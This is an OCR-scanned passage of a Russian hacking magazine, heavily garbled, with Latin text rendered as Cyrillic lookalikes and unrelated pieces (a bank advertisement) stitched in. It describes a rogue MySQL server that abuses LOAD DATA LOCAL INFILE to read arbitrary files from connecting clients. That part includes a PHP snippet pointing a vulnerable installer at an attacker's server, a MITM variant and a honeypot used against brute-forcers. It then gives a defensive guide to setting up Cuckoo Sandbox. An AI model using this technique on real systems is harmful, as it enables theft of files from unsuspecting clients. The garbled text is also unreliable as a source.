она не требует повышенных привилегий, так как 
считается, что клиент читает собственные файлы. 
Найти бы вариант выполнить команду І_ОАО РАТА 
І_ОСАІ_ ІМРИЕ, причем без желания клиента. 

В первую очередь изучаем материалы по 
теме, например на гсіоі.огд ( ЫЦу/ѵдЦгУѵѵ ). По- 
мимо описанных трюков, также можно попробо- 
вать поиграться с триггерами, но в случае зеіесі:- 
запросов они бесполезны. 

В итоге для решения задачи нужно предста- 
вить себе логику программиста, разрабатываю- 
щего СУБД. Для того чтобы выполнить запрос, 
его необходимо распарсить. После этого можно 
выполнить нужные команды и отдать данные кли- 
енту. Соответственно, запрос с оператором ЮАР 
РАТА І_ОСАІ_ тоже должен где-нибудь разобраться. 
Варианта всего два: на сервере или на клиенте, но 
второй случай мы сразу отбрасываем, так как это 
было бы абсолютно неправильно с точки зрения 
архитектуры. Значит, оператор все-таки обраба- 
тывается на сервере, после чего клиенту, видимо, 
отправляет служебное сообщение «Отдай мне 
файл с таким-то именем». Клиент получает со- 
общение и отдает запрошенные данные серверу. 

А теперь самое главное! А что, если на любой 
ЗОЬзапрос от клиента отвечать служебным со- 
общением «Отдай мне файл»? :) 

ПРАКТИКА 

В обычном случае взаимодействие с БД выгля- 
дит так: мы авторизуемся —*■ если авторизация 
успешна, отправляем запрос — > получаем ре- 
зультат. Последние два пункта можно повторять 
сколько угодно раз. Однако для ЮАР РАТА І_ОСАІ_ 
ІЫРІІ_Е все немного иначе. Обрати внимание на ІР- 
адреса и порты, с которых приходят запросы: 

1. Предположим, мы уже авторизованы и по- 
сылаем запрос І_ОАО БАТА І_ОСАІ_ ІЫРНЕ "С:\\ 

ѴѴіпсІо\л/з\\5у5І:ет32\\сІгіѵегз\\е1:с\\Ііо5І:5" I ІМТО 

ТАВІ_Е тузді.іезі. 



В результате простейший скрипт на Руікоп’е, 
выдающий себя за МуЗС^-сервер, может про- 
читать любой файл с подключающего клиента . 
Разве это не прекрасно? 



4 0.0033 5100192.168.127.2 


192.168.127.128 


Му5<}1_ 


148 кедие5Т с>иегу 


5 0.00366300192.168.127.128 


192.168.127.2 


Му5<}1_ 


96 яезропзе тавш_а& 




Ответ сервера на запрос І.ОАО РАТА ШСАЬ #2 




Контент файла летит на сервер #3 
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0 Му5<}1_ РГОІОСОІ 

Раскеі іепдіН: 61 
Раскеі митЬег: О 
0 5егѵег огееііпд 
ргоіосоі : 10 

ѵегзіоп: 5 . 1 . 66 - 0 + 5 диееге 1 
тИгеас! ю: 54 
Баіі: еѵіізаіі 

0 Бегѵѳг сараЬі! іііе 5 : 0 хр 7 рр 



1 = і_опд РаззигогсІ: Бег 

1 . = РоипсІ Роіѵз: Беі 

. 1 .. = юпд соіитп Ріадэ: Бег 

1 = соппесі мііН оаіаЬазе: Беі 

..1 = ооп’і аПоіѵ сІаіаЬазе.іаЫе. соіитп: Беі 

.0 = сап изе сотргеззіоп ргоіосоі: N01 зеі 

1 = сювс сі і ет : Беі 



= сап іізе ЮАР оата юсац: Бег 



1 = ідпоге Брасез Ье-Роге *(': 5еі 

1 = 5реак5 4.1 ргогосоі (пеѵѵ -Над): Бег 

1 = іпіегасііѵе сііепі: Бег 

О = Би/іісН іо 551 а1"іег НапсІБНаке: N01 5еі 

1 = ідпоге зідрірез: Беі 

..1 = Кпоюз аЬоиі ігапБасііопз : Беі 

.1 = Бреакэ 4.1 ргоіосоі (оісі -Р1 ад): Беі 

1 = сап сіо 4.1 аиіНепіісаііоп: Беі 



сИагзеі: Іаііпі сонате 1аііп1_з\ѵесІІ5Н_сі (8) 
Ш Бегѵег Біаіиэ: 0x0002 
ііпизесі: 

Баіі: оіНеаагза! 



Бит, говорящий о возможности использования І.ОАО ОАТА 1_ОСАІ_ 



пгіузді. Весь его функционал заключался в том, 
что он принимает подключения от Му50І_- 
клиента (причем неважно, какой логин и пароль 
используется для подключения) и на любой за- 
прос клиента отправляет запрос на чтение опре- 
деленного файла. Общение выглядит следую- 
щим образом: 

1. Клиент выполняет запрос 5ЕІ.ЕСТ * РВОМ 
тузді.изег (1). 

2. Сервер отвечает: «А прочитай-ка лучше свой 
файл с:/Ьоо1:.іпі» (2). 

3. Прочитать файл? Ну лааадно, держи (3). 

В результате простейший скрипт на РуІНоп’е, 
выдающий себя за Му50І_-сервер, может прочи- 
тать любой файл с подключающего клиента (как 
в данном случае Ьооі.іпі). Разве это не прекрасно? 

ШТНЕОТІЮ 

Способ запуска: руіИоп годие_плуздІ.ру. По де- 
фолту читается случайный файл из списка в са- 
мом начале скрипта. 

Где может пригодиться? К примеру, теперь 
могут пригодиться установочные скрипты Ворд- 
пресса или рІірМуАсІтіп с нерабочими базами 
Му50І_. Обращаемся на наш сервер и получаем 
полноценную читалку файлов в контексте уязви- 
мого клиента. Ниже представлен небольшой при- 
мер для наглядности: 

< ? рИр 

$сопп = тѵзді сопп есі^ 



( $_(зЕТ [ ' тѵздІ ІіОБІ рогІ '],<-■ 
' гооі ' , ' 12345 ' 1 ; 
ту5д1_диегѵ( '5ЕІ.ЕСТ * <-■ 
ЕКОМ тѵз ді. из ег ' 1 ; 

?> 



Или другой вариант: можно реализовать 
небольшой Ііопеуроі:, в котором файлы будут 
читаться с сервера брутера/атакующего. Это 
вообще может получиться забавный экспери- 
мент с интересными результатами. Так, оста- 
вив работающим скрипт годиегпузді.ру, мы 
насобирали порядочное количество файлов 
Нозіз, принадлежащих нашим серверам, с ко- 
торых мы тестировали брутфорс :). 

НЕМНОГО ДЕГТЯ 

Уязвимость интересная, но, к сожалению (или 
к счастью?), не все Му50І_-клиенты по умол- 
чанию собраны с флагом, отвечающим за воз- 
можность исполнения функционала І_ОАЭ ЭАТА 
І_ОСАІ_. Это серьезное ограничение (парни 
сильно расстроились, когда так и не смогли 
пробить ни мой СІІІ-клиент на Мас’е, ни стан- 
дартный Му5СМ_- клиент, запущенный на ІІЬипШ; 
видимо, в гости в офис РТ больше не пустят. — 
Прим, главреда). 

Выяснить, поддерживает ли клиент этот функ- 
ционал или нет, можно поданным первого пакета, 
пришедшего серверу от клиента, в секции Зегѵег 
Сгееііпд. Пример данных из такого пакета пред- 
ставлен на рисунке. 



НОВАЯ ФИШКА 
ШТЕКСЕРТЕК-ИС 

Естественно, эту особенность клиентов 
Му80І_ вполне можно использовать при 
МІТМ-атаках в процессе проведения 
тестирования на проникновение. Не надо 
ждать, пока клиент сам выполнит опе- 
ратор І_ОАЭ ЭАТА І_ОСАІ_, — достаточно 
просто оказаться между ним и серве- 
ром :). Агез, автор тулкита Іпіегсеріег 
( іпіегсеоіег.пегіги ). заинтересовался 
нашей находкой и с радостью добавил 
функционал для реализации подобной 
атаки. Официально эта функция станет 
доступной после релиза нового билда. 

Но если не терпится, ты всегда можешь 
попросить у автора сборку, включающую 
в себя этот новый функционал. 




Новый функционал в Іпіегсеріег-ИС 



ВМЕСТО ЗАКЛЮЧЕНИЯ 

По правде говоря, оператор І_ОАЭ ЭАТА 
І_ОСАІ_ — это уже сама по себе интересная шту- 
ка, которая не раз помогала нам при проведе- 
нии тестов на проникновения, еще до момента, 
когда мы нашли возможность для выполнения 
обратной атаки. 

Немного покопавшись в документации, мы 
обнаружили, что разработчики частично в курсе 
этой особенности. Так, на официальном сайте 
сказано, что теоретически между клиентом и 
сервером Му80І_ может вмешаться третье лицо и 
модифицировать запрос І_ОАЭ ЭАТА І_ОСАІ_, в ре- 
зультате в базу будет записан совершенно другой 
файл. Но такая ситуация маловероятна. А вот что 
действительно реально, так это описанная сегод- 
ня концепция хонипота. 

Как ты видишь, тема атаки на клиенты со сто- 
роны сервера на данный момент раскрыта не пол- 
ностью. И вполне реально обнаружить подобные 
забавные особенности и для других сервисов, 
доступных по другим портам. Помни, хакер: под- 
ключился к чужому серверу — будь осторожен! 
Атаковать тебя может и легальный владелец ре- 
сурса! НЕ 




127.0. 0.1 ІосаІЬозЪ 

127.0. 1.1 Ы.^оо.огд ЪЬ 

# ТЬе ^оііоѵіпд ііпез аге сіезігаЫе іох ІРѵб сараЫе >юзъз 
: : 1 ІосаІЬозЪ ір6-1оса1!іозЪ ірб-ІоорЬаск 

^е00::0 ірб-іосаіпет. 

^^00::0 ірб-тсазъргеііх 
^02 : : 1 ірб-аііпосіез 
1:1:02: :2 ірб-аіігоиъегз 
^02: :3 ірб-аііпозъз 



Сливаем Ьооііпі 



Файл атакующего 











ах, ресторанах и 
іинах твоего 



города 



Участвовать в акциях и посещать закрытые 
мероприятия для держателей «Мужской Кар 



Управлять своими счетами, используя систему 
интернет-банка «Альфа-Клик» 



Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а также заказав по телефонам: 

8 (495) 788-88-78 в Москве | 8-800-2000-000 в регионах России (звонок бесплатны^) 



МАХІМ А 



Альфа « Банк 



ѵѵѵѵѵѵ.тапсагсі.ги 



:овских операций от 05.03 
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КУКУШКА 
В ДЕЛЕ 

Автоматизация поиска вредоносных 
файлов в корпоративной сети на базе 
Сискоо ВапдЪох 



Вирусная аналитика — очень 
познавательное и занима- 
тельное занятие, особенно 
поиск и исследование све- 
жих семплов вредоносов. 

В корпоративной сети де- 
лать это вручную достаточно 
трудоемко и отнимает много 
рабочего времени. Я рас- 
скажу, как автоматизировать 
этот процесс с помощью 
Сискоо ЗапсІЬох и повысить 
эффективность антивирус- 
ной защиты в компании. 



НАЗНАЧЕНИЕ 

Сискоо ЗапсІЬох — автоматизированная опенсорсная система анализа вре- 
доносного ПО (для простоты будем называть ее просто «кукушка»). Кукушка 
представляет собой песочницу с инструментарием, позволяющим автомати- 
чески запускать в ней файлы и анализировать их поведение, а также отслежи- 
вать состояния системы (песочницы) и протекающие в ней процессы. 

Термин «песочница» определяет изолированную виртуальную среду, 
предназначенную для тестирования кода или ненадежного ПО. На практике 
песочница используется для динамического анализа потенциально вредо- 
носных файлов. Ценность такого подхода, в отличие от статического, заклю- 
чается в получении важной информации о зловреде: 

• какие ресурсы используются (как локальные, так и внешние); 

• какие применяются методы обхода средств защиты; 

• какие уязвимости эксплуатируются. 

ФУНКЦИОНАЛЬНЫЕ ВОЗМОЖНОСТИ 

Сискоо ЗапсІЬох разработана на РуіЬоп’е с использованием модульного раз- 
деления задач. В качестве изолированной виртуальной среды для анализа 
потенциальных вредоносов кукушка позволяет использовать следующее 
ПО виртуализации: КѴМ, ѴігІиаІВох, ѴМѵѵаге. 

Изначально авторы предполагали в качестве гостевой операционной си- 
стемы в виртуальной среде использовать МісгозоТІ: ѴѴіпсІоѵѵз ХР 8РЗ. Видимо, 
это связано с популярностью именно этой операционной системы и, соответ- 



ственно, с существующим многообразием многофункционального вредонос- 
ного ПО для этой платформы. Однако при тестировании выяснилось, что во- 
преки предположениям кукушка оказалась работоспособной в ОС ѴѴіпсІоѵѵз 
Ѵізіа и ѴѴіпсІоѵѵз 7, а также 08 X. В качестве основной ОС (хост-системы) раз- 
работчики рекомендуют платформу СІЧІІ/ипих. 

Итак, как я уже сказал, Сискоо ЗапсІЬох умеет анализировать файлы и по- 
зволяет получить следующие типы отчетов о проверке: 

• перечень вызываемых функций ѴѴіп32 АРІ всеми процессами, порожден- 
ными зловредом; 

• перечень файлов, которые были загружены, созданы, удалены или к кото- 
рым происходило обращение во время работы зловреда; 

• дамп памяти потенциально вредоносных процессов; 

• логирование сетевого трафика в формате РСАР; 

• скриншоты рабочего стола, сделанные во время выполнения малвари; 

• полный дамп памяти виртуальной машины; 

• результат проверки файла на ѴігизТоІаІ ( ѵігизіоіаі.сот ). 

Кукушка может быть использована для анализа исполняемых файлов 
ОС семейства ѴѴіпсІоѵѵз и динамических библиотек (*.сІІІ), документов в фор- 
мате РБР и МісгозоТІ: ОТТісе, ШЬ-ссылок и РНР-скриптов. Благодаря своей 
модульности, этот инструмент предоставляет тебе широкие возможности 
для создания собственных скриптов и конфигурации аналитической системы 
вредоносов. 
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Рис. 1 . Запуск кукушки 




Взлом 
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Рис. 2. Результат отправки файла на проверку 

РАЗВЕРТЫВАНИЕ И НАСТРОЙ КА КУКУШКИ 

Для развертывания Сискоо ЗапбЬох тебе понадобится следующее ПО: 

• дистрибутив РуІЬоп (2.7); 

• ЗОЬМсИету (0.7.10); 

• дистрибутив кукушки; 

• дистрибутив виртуальной среды (КѴМ, ѴігШаІВох или ѴМѵѵаге); 

• утилита Ісрбиплр для анализа сетевого трафика. 

А также дополнительные компоненты, которые рекомендуют разработчики: 

• Оркѣ (обязателен для установки): требуется для извлечения необходи- 
мой информации из сетевых пакетов; 

• Лпіа2 (обязателен для установки): требуется для отображения веб- 
интерфейса и НТМІ_-отчетов; 

• Мадіс (дополнительно): требуется для идентификации формата прове- 
ряемого файла; 

• Рубеер (дополнительно): требуется для вычисления нечетких хешей; 

• Руплопдо (дополнительно): требуется, если используется база данных 
МопдойВ вместо стандартной; 

• Ѵага и Ѵага РуШоп (дополнительно): требуется для сравнения Ѵага- 
сигнатур (лучше использовать зѵп-версию); 

• ЫЬѵіг* (дополнительно): требуется в случае использования менеджера 
виртуальных машин КѴМ; 

• Войіеру (дополнительно): требуется для использования утилиты ѵѵеЬ.ру 
и арі.ру (директория ііНІз, в составе дистрибутива кукушки); 

• РеТіІе (дополнительно): требуется для выполнения статического анализа 
бинарных файлов РЕ32; 

• РуИіоп Ітаде ЫЬгагу (дополнительно): требуется для снятия скриншотов 
рабочего стола (виртуальная среда), в процессе анализа зловреда. 




Рис. 3. Сформированный отчет проверки в формате НТМЬ 



Замечу, что при установке дополнительных компонентов тебе потре- 
буется иметь предустановленные пакеты для РуІЬоп’а: МагкирЗа^е-О.Ів, 
зеШріооІз-О.Э.б. Как отмечено выше, авторы кукушки рекомендуют использо- 
вать в качестве основной ОС (хост-системы) платформу СІЧІІ/ипих. По опре- 
деленным причинам я мог использовать только компьютер с предустанов- 
ленной ОС семейства ѴѴіпбоѵѵз. Поэтому, идя вразрез с рекомендациями, 
я решил использовать ѴѴіпсІоѵѵз ХР ЗРЗ. И это решение создало мне немало 
трудностей (пришедших в негодность две клавиатуры и одного мыша), пока 
я успешно не запустил эту песочницу. Для себя в очередной раз сделал вы- 
вод — по возможности лучше прислушиваться к рекомендациям. 

В целом, следуя официальной инструкции Сискоо ЗапсІЬох Воок ( Ьіі. 
Іѵ/14ѵѵ9окѵ ) (офлайн-версия лежит в каталоге сискоо\сІос5\Ьоок), развернуть 
и настроить кукушку не составит особого труда, особенно если ты будешь 
разворачивать ее на Ыпих. Я лишь кратко укажу самые важные моменты. 

Все конфигурационные файлы Сискоо ЗапсІЬох расположены в папке 
Сискоо\согѵР\. В файле сискоо . соп-Р производятся основные настройки рабо- 
ты аналитической системы. В нем необходимо указать ІР-адрес ПК, на кото- 
ром будет запущена сискоо. Кроме того, при использовании функции анализа 
сетевого трафика необходимо указать путь расположения утилиты ісрбиплр. 
ехе, а также идентификатор сетевого устройства, которое будет прослуши- 
ваться. В данном случае лучше всего использовать сетевое устройство вир- 
туальной машины, чтобы однозначно определять принадлежность трафика. 
Для получения списка идентификаторов сетевых устройств (в ѴѴіпсІоѵѵз) мож- 
но воспользоваться той же утилитой Ісрбитр с параметром -О. 

В ргосе55Іп§.согтР настраивается обработка полученной информации. 
В нем ты можешь определить, какую категорию получаемой информации не- 
обходимо обрабатывать. А в файле герог1:іп§. соп-Р нужно выбрать, в каком 
формате формировать отчет о результатах проверки. 




КУКУШКА НА ѴѴІШѴѴЗ 

На случай, если ты решишь, как и я, развора- 
чивать кукушку на винде, расскажу, какие труд- 
ности тебя ожидают. Связаны они в основном 
с установкой дополнительных компонентов — 
Мадіс и рубеер. 

Мадіс необходим Сискоо ЗапсІЬох для опре- 
деления типа файла по его расширению. В офи- 
циальной документации авторы ссылаются 
на ресурс разработчиков ( Ьі1:.Іѵ/га2ТР0 ). Однако 
мне не удалось установить этот пакет, так 
как он требовал компиляции библиотек. Пробле- 
му установки можно было решить компиляцией 
либо воспользоваться готовыми библиотеками 
(если такие имеются). Я пошел по второму пути. 
Установочный пакет руШоп-тадіс и инструкцию 
по установке ты можешь найти тут: ЬіЫѵ/ІЭІИЕЗ . 
Обращаю твое внимание, что для успешной 
установки пакета потребуется скопировать 
в системную папку С : \ІлІіпсІоы5\5у5І:ет32 три 



динамические библиотеки: тадісі .611, 2 ІІЫ . 
сІІІ, гедех2.бІІ. Ссылки для скачивания найдешь 
на той же странице. 

Компонент рубеер, или ззбеер (у меня 
был ззбеер-2. 9-0.3), используется кукушкой 
для вычисления ІДггу-хешей (нечетких хешей). 
Это очень распространенный метод для иден- 
тификации неидентичных объектов. Применим, 
например, в аналитике вредоносов, для об- 
наружения различных сборок одного и того 
же класса. К сожалению, для ззбеер я готовых 
библиотек не нашел. Поэтому пришлось ком- 
пилировать самому. Нагуглил только рекомен- 
дацию, что для сборки библиотеки подѴѴіпбоѵѵз 
необходимо установить РуШоп 2.7 (или выше), 
компилятор ССС (МіпСѴѴ) и СуіЬоп. 

РуіЬоп уже установлен, качаем МіпСѴѴ 
и СуШоп. Так как для установки СуШоп’а тоже 
требуется компиляция библиотек, сперва уста- 
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Кукушка в деле 



«5 



Создание виртуальной среды для проверки потенциальных вредоносов — 
процесс творческий, нужно сделать ее максимально похожей на реальную 
компьютерную систему, в которой работает пользователь 



Б:\(іеі*е1орЧсискоо_0.5ЧсискооЧи1;іІ5>5иЬпі^ .ру — игі уа.ги 
Биссезз: йНЬ "уа.ги" аЛЛей аз Таз к иіТЬ ІО 19 

Б:\<1еие1орЧсискоо_0.5\сискооЧиТіІ5>зиЪітііТ .ру — раскаде ехе Ю:\поТерас1.ехе 
Биссезз: Рііе "ОЛпо^ераЛ.ехе" аЛДесІ аз Таз к иі(;Ь ІО 20 

Б:\<1еие1ор\сискоо_0.5\сискоо\иТі1з> 



Рис. 4. Отправка файла на проверку из консоли 



НАСТРОЙКА ВИРТУАЛЬНОЙ СРЕДЫ 

Создание виртуальной среды для проверки потенциальных вредоносов — 
процесс творческий, нужно сделать ее максимально похожей на реальную 
компьютерную систему, в которой работает пользователь. Это позволит тебе 
получить наилучший результат при анализе файлов. 

При настройке виртуальной среды сетевое взаимодействие с виртуаль- 
ной машиной необходимо настроить как сетевой мост. Заранее определи 
ІР-адрес(а), который(е) будет использовать виртуальная машина при ручной 
настройке сетевого интерфейса. А также отключи брандмауэр и центр обнов- 
ления. 

Если планируется использовать одноранговую сеть, необходимо задать 
пароль для учетки локального пользователя виртуальной машины (настройка 
ОС) и создать локального пользователя в основной системе с таким же име- 
нем и паролем (применительно для ѴѴіпсІоѵѵз). 

Кроме того, на виртуальной машине нужно установить дополнительное 
ПО в соответствии с типами файлов, которые планируешь проверять в вир- 
туальной среде. 

После того как завершишь настройку виртуальной среды, не забудь со- 
хранить ее состояние и сделать клон виртуальной машины (на всякий случай). 
Как — подробно описано в официальной инструкции ( ЬИ:.Іѵ/13Н70оѵ ). 

Затем в конфигурационном файле <тасИіпетападег>.соп1 : , который 
определяет настройки работы виртуальной среды, тебе потребуется указать 
перечень используемых виртуальных машин, режим запуска виртуальной 
среды, ІР-адреса и другое. 

После чего самое время проверить работоспособность кукушки. Для это- 
го тебе потребуется выполнить скрипт сискоо . ру, который расположен в кор- 



не каталога сискоо. Результат успешного выполнения скрипта изображен 
на рис. 1 . Если при запуске кукушки выдается сообщение об ошибке, еще раз 
убедись, все ли необходимые компоненты были установлены, и проверь кон- 
фигурационные файлы. 

ПРОВЕРКА ФАЙЛОВ 

Чтобы выполнить проверку файла в виртуальной среде Сискоо, ты можешь 
воспользоваться веб-интерфейсом, который запускается скриптом меЬ.ру, 
расположенным в каталоге сискоо\и1:іІ5. 

В браузере перейди по адресу ІтЫр : //127 .0.0.1: 8080. В форме выбери 
файл, который требуется проверить. Установи приоритет и дополнительные 
опции — и файл готов к отправке на проверку в песочницу. 

С описанием параметров и опций проверки файла можешь ознакомиться 
здесь: ЬИ.Іѵ/ІбиѵѵЭТРІ либо Ыиѵ/121)рео7 . 

При успешной отправке файла система сообщит тебе идентификатор за- 
дачи и ссылку на задачу, где ты сможешь просмотреть результат проверки 
(рис. 2). По окончании анализа файла в виртуальной среде в зависимости 
от настроек аналитическая система сформирует отчет, который станет до- 
ступным для просмотра. 

Помимо веб-формы, для отправки файла или ссылки на проверку в песоч- 
нице ты можешь использовать скрипт зиЬтіІі.ру из сискоо\и1:іІ5. Принцип 
использования скрипта схож с веб-формой. Также в качестве входных пара- 
метров необходимо указать параметры и опции проверки файла (рис. 4). 

Во время отправки файла или ссылки на проверку для формируемой за- 
дачи кукушка создает профиль с именем идентификатора задачи. Профиль 
создается в каталоге сискоо\з1:ога§е\апа1у5е5\ (рис. 5). 



навливаем МіпСѴѴ. Замечу, что после установки 
компилятора стоит проверить переменные 
среды, а точнее наличие в переменной РАТН 
строки с : \тіп§ы\Ьіп. Если нет — дописываем 
и перезагружаемся. 

Далее необходимо сообщить РуІНоп’у, 
что для компиляции будем использовать ком- 
пилятор МіпСѴѴ. Для этого переходим в каталог 
Ру1:Ііоп27\ІіЬ\сІІ5І:и1:іІ5\. Создаем в нем конфи- 
гурационный файл сіізііиііііз . сТ§ (изначально его 
там нет) и записываем в него следующие строки: 

Г Ьиіісі 1 

сотрііег = тіп§іл/32 

Также немного скорректируем файл 
су§ыіпссотрі1ег.ру, который расположен 
в том же каталоге. В нем надо закомментиро- 
вать вызов метода зеі-р. 5е1:_ехеси1:аЫе5( . . . ) 



в классах Су§ыіпССотрі1ег (ІіпіхССотріІег) 
и Міп§ы32ССотрі1ег (Су§ыіпССотрі1ег), после 
чего можно приступить к установке СуШоп. 

Но это не все. 

Выполнив все необходимые для этого требо- 
вания, я приступил к установке ззсіеер. Но и тут 
без подводных камней не обошлось. Во время 
компиляции установочный скрипт зеііир . ру 
(ззсіеер) в командной консоли ѴѴіпсІоѵѵз пытается 
выполнить команду ./соприте && таке. И по- 
нятное дело, вылетает ошибка — командный 
интерпретатор не знает такой команды. 

Что ж, раз уж пошла такая пьянка, давай уста- 
навливать Судѵѵіп. При установке Судѵѵіп также 
необходимо выбрать дополнительный пакет 
таке. После установки Судѵѵіп нужно отредакти- 
ровать установочный скрипт 5е1:ир. ру (ззсіеер): 
в классе сіазз Виі1сІЕх1:еп5Іоп(Ьиі1сІ_ех1:. 
Ьиі1сі_ех1= ) изменить строку 



(ссі ззсіеер && . /сопб^иге && таке) 
на 

( ссі ззсіеер && зіі сопб^иге && таке). 

потому что Судѵѵіп тоже не понимает . / . 

Далее нужно запустить консоль Судѵѵіп, 
перейти в каталог 55сІеер-2.9-0. 3\5зсіеер\ 
и выполнить команду 

зіі сопіп^иге && таке 

И только после ее успешного выполнения 
в командной консоли ѴѴіпсІоѵѵз можно выполнить 
скрипт установки зеііир . ру іпзііаіі (ззсіеер). 

Почему необходимы такие танцы с бубном, 
я не совсем понимаю, но только так компонент 
ззсіеер устанавливается успешно. 






